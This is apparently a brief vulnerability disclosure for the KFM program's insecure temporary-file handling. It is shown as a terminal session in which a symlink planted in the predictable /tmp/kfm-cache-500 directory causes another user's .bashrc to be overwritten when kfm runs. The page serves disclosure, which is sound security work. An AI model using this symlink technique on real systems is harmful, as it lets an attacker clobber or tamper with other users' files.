|
KFM Insecure TMP File Creation Vulnerability
root@ps:/tmp/kfm-cache-500 > ls -la drwxrwxrwx 2 rws uboot 4096 Apr 18 21:18 . drwxrwxrwt 15 root root 770048 Apr 18 21:16 .. lrwxrwxrwx 1 rws uboot 18 Apr 18 21:18 index.html -> /home/paul/.bashrc -rw-r--r-- 1 rws uboot 0 Apr 18 21:16 index.txt root@ps:/tmp/kfm-cache-500 > ls -la /home/paul/.bashrc -rw-r--r-- 1 paul users 1458 Jan 23 13:56 /home/paul/.bashrc and after running kfm as user 500: root@ps:/tmp/kfm-cache-500 > ls -la /home/paul/.bashrc -rw-r--r-- 1 paul users 271 Apr 18 21:19 /home/paul/.bashrc |
|
|
Privacy Statement |
